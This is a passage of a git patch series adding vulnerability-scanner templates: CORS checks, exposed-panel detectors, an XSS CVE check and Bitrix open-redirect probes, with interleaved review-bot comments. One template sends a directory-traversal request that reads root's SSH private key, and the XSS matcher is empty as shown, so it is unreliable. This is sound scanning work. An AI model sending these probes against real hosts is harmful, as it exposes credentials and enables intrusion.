From d8e0fd3ef0ab77ba5b07b00a26fa755894a4c34f Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:40:04 -0300 Subject: [PATCH 01/52] add cors-misconfig.yaml --- cors-misconfig.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cors-misconfig.yaml diff --git a/cors-misconfig.yaml b/cors-misconfig.yaml new file mode 100644 index 0000000000..4d3fff5153 --- /dev/null +++ b/cors-misconfig.yaml @@ -0,0 +1,23 @@ +id: cors-misconfig + +info: + name: Cross-Origin Resource Sharing Misconfiguration + author: G4L1T0 and @convisoappsec + severity: info + tags: cors + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 + Origin: https://www.convisoappsec.com + matchers: + - type: word + part: header + words: + - "Access-Control-Allow-Origin: https://www.convisoappsec.com" + - "Access-Control-Allow-Origin: *" + condition: or + From e98fb7179e1c2ca2895806fe3dd78ef7b651b8c6 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:56:37 -0300 Subject: [PATCH 02/52] update cors-misconfig.yaml --- .../generic/cors-misconfig.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cors-misconfig.yaml => vulnerabilities/generic/cors-misconfig.yaml (100%) diff --git a/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml similarity index 100% rename from cors-misconfig.yaml rename to vulnerabilities/generic/cors-misconfig.yaml From a44324ec2f2b57bea9a3e2a6d2a696d9771ccef7 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:57:37 -0300 Subject: [PATCH 03/52] updatev2 cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml index 4d3fff5153..6c3b810df0 100644 --- a/vulnerabilities/generic/cors-misconfig.yaml 
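Review bot: In cors-misconfig.yaml (PATCH 01/52) the second word, `"Access-Control-Allow-Origin: *"`, makes the template report every intentionally public endpoint, because browsers will not attach credentials to a wildcard response and nothing here checks `Access-Control-Allow-Credentials`. The first word has the same gap: an echoed origin without `Access-Control-Allow-Credentials: true` usually exposes nothing that a cross-site page could not already fetch anonymously. I would require the credentials header together with the reflected origin (`condition: and`) and either drop the wildcard word or move it to its own informational template. The same wildcard matcher is added to basic-cors.yaml in PATCH 04/52.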
+++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -2,7 +2,7 @@ id: cors-misconfig info: name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec + author: G4L1T0 and @convisoappsec severity: info tags: cors @@ -20,4 +20,3 @@ requests: - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - "Access-Control-Allow-Origin: *" condition: or - From cb94b580094c97218cd87b2c76f78f63aeaa09f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:13:45 +0530 Subject: [PATCH 04/52] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index a224186e83..85f9ebd824 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -2,7 +2,7 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration - author: nadino + author: nadino,G4L1T0,convisoappsec severity: info tags: cors @@ -13,6 +13,7 @@ requests: headers: Origin: https://evil.com + matchers-condition: or matchers: - type: word words: @@ -20,3 +21,8 @@ requests: - "Access-Control-Allow-Credentials: true" condition: and part: header + + - type: word + part: header + words: + - "Access-Control-Allow-Origin: *" From 5ac272597b8ab5d98d76740bf8edecfc8308c443 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:14:04 +0530 Subject: [PATCH 05/52] Delete cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 22 --------------------- 1 file changed, 22 deletions(-) delete mode 100644 vulnerabilities/generic/cors-misconfig.yaml diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml deleted file mode 100644 index 6c3b810df0..0000000000 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ /dev/null 
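Review bot: With `matchers-condition: or` in basic-cors.yaml (PATCH 04/52), the existing matcher that requires `Access-Control-Allow-Credentials: true` and the added wildcard matcher are reported as the same finding, so triage cannot tell a credentialed case from a plain `*` response in the result line. Giving each matcher a `name:` keeps them apart, for example `name: origin-with-credentials` on the first and `name: wildcard-origin` on the added one. The first matcher's word list begins above the hunk, so its full contents are not visible here.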
@@ -1,22 +0,0 @@ -id: cors-misconfig - -info: - name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec - severity: info - tags: cors - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 - Origin: https://www.convisoappsec.com - matchers: - - type: word - part: header - words: - - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - - "Access-Control-Allow-Origin: *" - condition: or From b466fce758464476a2a822d244d834d893d6ae2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:15:04 +0530 Subject: [PATCH 06/52] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index 85f9ebd824..f652c891f0 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -4,7 +4,8 @@ info: name: Basic CORS misconfiguration author: nadino,G4L1T0,convisoappsec severity: info - tags: cors + reference: https://portswigger.net/web-security/cors + tags: cors,generic requests: - method: GET From 3ba3b9ac4212760989db21f70dd809475c71c82c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:42:01 +0530 Subject: [PATCH 07/52] Create npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml new file mode 100644 index 0000000000..b6385dd3e8 --- /dev/null +++ b/vulnerabilities/other/npm-techdocs-common.yaml 
@@ -0,0 +1,26 @@ +id: npm-techdocs-common + +info: + name: NPM - techdocs-common - Directory Traversal + author: dhiyaneshDk + severity: high + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN OPENSSH PRIVATE KEY" + - "BEGIN PRIVATE KEY" + - "BEGIN RSA PRIVATE KEY" + condition: or + + - type: status + status: + - 200 + From 7863c1fdb97687042107601f8cadeb5c2749e958 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:44:03 +0530 Subject: [PATCH 08/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index b6385dd3e8..fbaed9e23a 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,12 +5,10 @@ info: author: dhiyaneshDk severity: high tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or - - type: status status: - 200 From 1f5edde716bf4dadef62abd686c088fd28fd3060 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:46:28 +0530 Subject: [PATCH 09/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index fbaed9e23a..d5f308a715 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml 
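Review bot: The probe in npm-techdocs-common.yaml (PATCH 07/52) proves the traversal by reading root's SSH private key, so every positive result pulls real key material over the wire and into whatever response logging the scan operator has enabled. A non-secret file demonstrates the same read; the Joomla templates later in this series use /etc/passwd with the regex `root:.*:0:0`. The `info` block also has no `description` or `reference`, so a reader cannot tell which techdocs-common versions are affected or where the fix is documented. The tags `config,exposure` do not mention traversal, whereas `lfi` is the tag used elsewhere in the series.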
@@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" matchers-condition: and matchers: - type: word @@ -20,4 +20,3 @@ requests: - type: status status: - 200 - From b521701607bba8a5f890845e4c389468565e85e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 01:52:54 +0530 Subject: [PATCH 10/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index d5f308a715..25df5e032b 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,10 +5,12 @@ info: author: dhiyaneshDk severity: high tags: config,exposure + requests: - method: GET path: - -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or + - type: status status: - 200 From 5e24f6400775999e235922612916f05609a7bb6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 22 Aug 2021 23:40:10 +0530 Subject: [PATCH 11/52] Delete npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml deleted file mode 100644 index 25df5e032b..0000000000 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: npm-techdocs-common - -info: - name: NPM - techdocs-common - Directory Traversal - author: dhiyaneshDk - severity: high - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - - matchers-condition: and - matchers: - - type: word - words: - - "BEGIN OPENSSH PRIVATE KEY" - - "BEGIN PRIVATE KEY" - - "BEGIN RSA PRIVATE KEY" - condition: or - - - type: status - status: - - 200 From 61f9470d22d53c1f8950e93ad100816826b0a780 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 09:27:54 +0530 Subject: [PATCH 12/52] Add files via upload --- iot/epson-unauthorized-access-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 iot/epson-unauthorized-access-detect.yaml diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml new file mode 100644 index 0000000000..641538010a --- /dev/null +++ b/iot/epson-unauthorized-access-detect.yaml @@ -0,0 +1,21 @@ +id: epson-unauthorized-access-detect +info: + name: Epson Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6922 + tags: iot,printer +requests: + - method: GET + path: + - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" + - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" + matchers-condition: and + matchers: + - type: word + words: + - "epson" + - "DNS/Proxy Setup" + - type: status + status: + - 200 \ No newline at end of file From d119642410beb1fa763ba279a5eb6432be072493 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 09:54:34 +0530 Subject: [PATCH 13/52] Add files via upload --- iot/epson-web-control-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 iot/epson-web-control-detect.yaml 
diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml new file mode 100644 index 0000000000..eb95e738dc --- /dev/null +++ b/iot/epson-web-control-detect.yaml @@ -0,0 +1,22 @@ +id: epson-web-control-detect +info: + name: Epson Printer + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/6873 + tags: iot,printer +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and + matchers: + - type: word + words: + - "epson web control" + - "advanced" + - "OSD control Pad" + - "Status Information" + - type: status + status: + - 200 \ No newline at end of file From 52177cb9f494ddf387d05faa8039877d51d90422 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 10:35:51 +0530 Subject: [PATCH 14/52] Add files via upload --- iot/epson-unauthorized-access-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml index 641538010a..5cbeaef202 100644 --- a/iot/epson-unauthorized-access-detect.yaml +++ b/iot/epson-unauthorized-access-detect.yaml @@ -10,12 +10,15 @@ requests: path: - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" + - "{{BaseURL}}/PRESENTATION/ADVANCED/COMMON/TOP" matchers-condition: and matchers: - type: word words: - "epson" - "DNS/Proxy Setup" + - "Network Status" + - "Status" - type: status status: - - 200 \ No newline at end of file + - 200 \ No newline at end of file From d80c32a3794c2b388a8c150d1ddcdaea0519be7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:18:50 +0530 Subject: [PATCH 15/52] Update epson-web-control-detect.yaml --- iot/epson-web-control-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml index eb95e738dc..b96f5ff435 100644 
--- a/iot/epson-web-control-detect.yaml +++ b/iot/epson-web-control-detect.yaml @@ -2,7 +2,7 @@ id: epson-web-control-detect info: name: Epson Printer author: pussycat0x - severity: info + severity: info reference: https://www.exploit-db.com/ghdb/6873 tags: iot,printer requests: @@ -19,4 +19,4 @@ requests: - "Status Information" - type: status status: - - 200 \ No newline at end of file + - 200 From b48f9cbaa6e915234e3c5f34994f214b574e9c5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:40:16 +0530 Subject: [PATCH 16/52] Update epson-unauthorized-access-detect.yaml --- iot/epson-unauthorized-access-detect.yaml | 24 +++++++++++++++-------- 1 file changed, 16 insertions(+), 8 deletions(-) diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml index 5cbeaef202..4eebc7cb91 100644 --- a/iot/epson-unauthorized-access-detect.yaml +++ b/iot/epson-unauthorized-access-detect.yaml @@ -1,24 +1,32 @@ id: epson-unauthorized-access-detect + info: name: Epson Printer author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6922 - tags: iot,printer + tags: iot,printer,panel + requests: - method: GET path: - - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" - - "{{BaseURL}}/PRESENTATION/ADVANCED/COMMON/TOP" + matchers-condition: and matchers: - type: word words: - - "epson" - - "DNS/Proxy Setup" - - "Network Status" - - "Status" + - "Epson Connect" + - "/IMAGE/EPSONLOGO.PNG" + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([A-Z-0-9]+) Series" From 57e3048d6f4f58c6921de362d5a5652028a83a32 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:57:14 +0530 Subject: [PATCH 17/52] Update epson-web-control-detect.yaml --- iot/epson-web-control-detect.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) 
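Review bot: After this rewrite of epson-unauthorized-access-detect.yaml (PATCH 16/52) the matchers only establish that the Epson Connect page answers 200 and references its logo, yet the template keeps `severity: medium` and an id that claims unauthorized access. Either add a matcher for content that is only present when settings are reachable without login, or lower the severity to `info` as in epson-web-control-detect.yaml and state in a `description` what a hit means. In the extractor, `[A-Z-0-9]` is easier to read with the hyphen last: `"([A-Z0-9-]+) Series"`.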
diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml index b96f5ff435..562e8a84cc 100644 --- a/iot/epson-web-control-detect.yaml +++ b/iot/epson-web-control-detect.yaml @@ -4,19 +4,22 @@ info: author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/6873 - tags: iot,printer + tags: iot,printer,panel + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and matchers: - type: word words: - - "epson web control" - - "advanced" - - "OSD control Pad" - - "Status Information" + - "Epson Web Control" + - "Basic Control" + - "Advanced" + condition: and + - type: status status: - 200 From a49982968a59be535dbc8d22819e601bf3dd263a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:58:18 +0530 Subject: [PATCH 18/52] Rename iot/epson-unauthorized-access-detect.yaml to exposed-panels/epson-unauthorized-access-detect.yaml --- {iot => exposed-panels}/epson-unauthorized-access-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {iot => exposed-panels}/epson-unauthorized-access-detect.yaml (100%) diff --git a/iot/epson-unauthorized-access-detect.yaml b/exposed-panels/epson-unauthorized-access-detect.yaml similarity index 100% rename from iot/epson-unauthorized-access-detect.yaml rename to exposed-panels/epson-unauthorized-access-detect.yaml From 36e06b0d3cd4bec3dea9dce9d2ee89660558eb88 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 15:09:40 +0530 Subject: [PATCH 19/52] Rename iot/epson-web-control-detect.yaml to exposed-panels/epson-web-control-detect.yaml --- {iot => exposed-panels}/epson-web-control-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {iot => exposed-panels}/epson-web-control-detect.yaml (100%) diff --git a/iot/epson-web-control-detect.yaml b/exposed-panels/epson-web-control-detect.yaml similarity index 100% rename from iot/epson-web-control-detect.yaml rename to exposed-panels/epson-web-control-detect.yaml 
From f5e70cbb98966924e52c944056d65840839ec8d3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:10:27 +0530 Subject: [PATCH 20/52] Update epson-unauthorized-access-detect.yaml --- exposed-panels/epson-unauthorized-access-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/epson-unauthorized-access-detect.yaml b/exposed-panels/epson-unauthorized-access-detect.yaml index 4eebc7cb91..a1d5e61482 100644 --- a/exposed-panels/epson-unauthorized-access-detect.yaml +++ b/exposed-panels/epson-unauthorized-access-detect.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6922 - tags: iot,printer,panel + tags: iot,printer,panel,unauth requests: - method: GET From 05c7f365562b3d39894e3a15a12562f4c24731ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:10:37 +0530 Subject: [PATCH 21/52] Update epson-web-control-detect.yaml --- exposed-panels/epson-web-control-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/epson-web-control-detect.yaml b/exposed-panels/epson-web-control-detect.yaml index 562e8a84cc..34625e5958 100644 --- a/exposed-panels/epson-web-control-detect.yaml +++ b/exposed-panels/epson-web-control-detect.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/6873 - tags: iot,printer,panel + tags: iot,printer,panel,unauth requests: - method: GET From d21e19e47b506c83fc39fdfb01f6d9f802169b41 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:54:33 +0530 Subject: [PATCH 22/52] Create honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/honeywell-web-controller.yaml 
diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml new file mode 100644 index 0000000000..21a061ba40 --- /dev/null +++ b/exposed-panels/honeywell-web-controller.yaml @@ -0,0 +1,22 @@ +id: honeywell-web-controller + +info: + name: Honeywell XL Web Controller + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7130 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/standard/default.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Honeywell XL Web Controller' + - type: status + status: + - 200 From 8ee3ca49fc71e909d49aded383aa6b1b2faa9445 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:56:07 +0530 Subject: [PATCH 23/52] Create ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/ibm-note-login.yaml diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml new file mode 100644 index 0000000000..b91e156e27 --- /dev/null +++ b/exposed-panels/ibm-note-login.yaml @@ -0,0 +1,22 @@ +id: ibm-note-login + +info: + name: IBM iNotes Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7122 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/names.nsf' + + matchers-condition: and + matchers: + - type: word + words: + - 'IBM iNotes Login' + - type: status + status: + - 200 From 60e28168153d18f51200bf6f00b01d850b33aef6 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Tue, 24 Aug 2021 10:29:51 -0700 Subject: [PATCH 24/52] Added CVE-2018-12095.yaml Template --- cves/2018/CVE-2018-12095.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2018/CVE-2018-12095.yaml diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml new file mode 100644 index 0000000000..fa4f64630b --- /dev/null 
+++ b/cves/2018/CVE-2018-12095.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-12095 + +info: + name: OEcms 3.1 - Cross-Site Scripting + author: Borna Nematzadeh + severity: medium + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + - https://www.exploit-db.com/exploits/44895 + - https://cxsecurity.com/issue/WLB-2018060092 + tags: cve,cve2018,xss,OEcms + +requests: + - method: GET + path: + - '{{BaseURL}}/cms/info.php?mod=list' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From 70845edb9d62ebe9a0eefa91763de5191168103e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:00:03 +0530 Subject: [PATCH 25/52] Create synology-web-station.yaml --- technologies/synology-web-station.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/synology-web-station.yaml diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml new file mode 100644 index 0000000000..0493eb631b --- /dev/null +++ b/technologies/synology-web-station.yaml @@ -0,0 +1,22 @@ +id: synology-web-station + +info: + name: Synology Web Station + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7125 + tags: tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Hello! Welcome to Synology Web Station!' + - type: status + status: + - 200 From 701cc6abeb23e83ebdcbf41cb5a5498fbc2bfade Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:04:31 +0530 Subject: [PATCH 26/52] Create web-service-panel.yaml --- exposed-panels/web-service-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/web-service-panel.yaml 
diff --git a/exposed-panels/web-service-panel.yaml b/exposed-panels/web-service-panel.yaml new file mode 100644 index 0000000000..9a7d309981 --- /dev/null +++ b/exposed-panels/web-service-panel.yaml @@ -0,0 +1,22 @@ +id: web-service-panel + +info: + name: WEB SERVICE Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7116 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB SERVICE' + - type: status + status: + - 200 From 2285ce9faa759aa35af10ecd9f1de3140d29274d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:09:26 +0530 Subject: [PATCH 27/52] Create lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/lacie-panel.yaml diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml new file mode 100644 index 0000000000..f98eb897cc --- /dev/null +++ b/exposed-panels/lacie-panel.yaml @@ -0,0 +1,22 @@ +id: lacie-panel + +info: + name: LaCie Login Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7118 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/' + + matchers-condition: and + matchers: + - type: word + words: + - 'id_LaCie' + - type: status + status: + - 200 From 2a3b20de2c97366a5ba85bacd793ffaa8b173882 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Tue, 24 Aug 2021 12:27:07 -0700 Subject: [PATCH 28/52] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index fa4f64630b..9cd62bafb4 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml 
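Review bot: The only body matcher in web-service-panel.yaml (PATCH 26/52) is the string `WEB SERVICE` requested at `{{BaseURL}}`, which is generic enough to match unrelated sites that use the phrase, and the template never says which product it is meant to identify. A second, product-specific string in the same matcher with `condition: and`, plus a `description` naming the device or vendor, would make a hit actionable. The quoted string may have carried surrounding markup that this rendering dropped; even as a page title the phrase is not distinctive.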
@@ -2,7 +2,7 @@ id: CVE-2018-12095 info: name: OEcms 3.1 - Cross-Site Scripting - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 From 8fb3c65965d8c7d5a91067c541e4973054da40c9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 01:32:14 +0530 Subject: [PATCH 29/52] template fix --- vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index ebe3db78d6..d8b2d88748 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -21,7 +21,7 @@ requests: - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - - 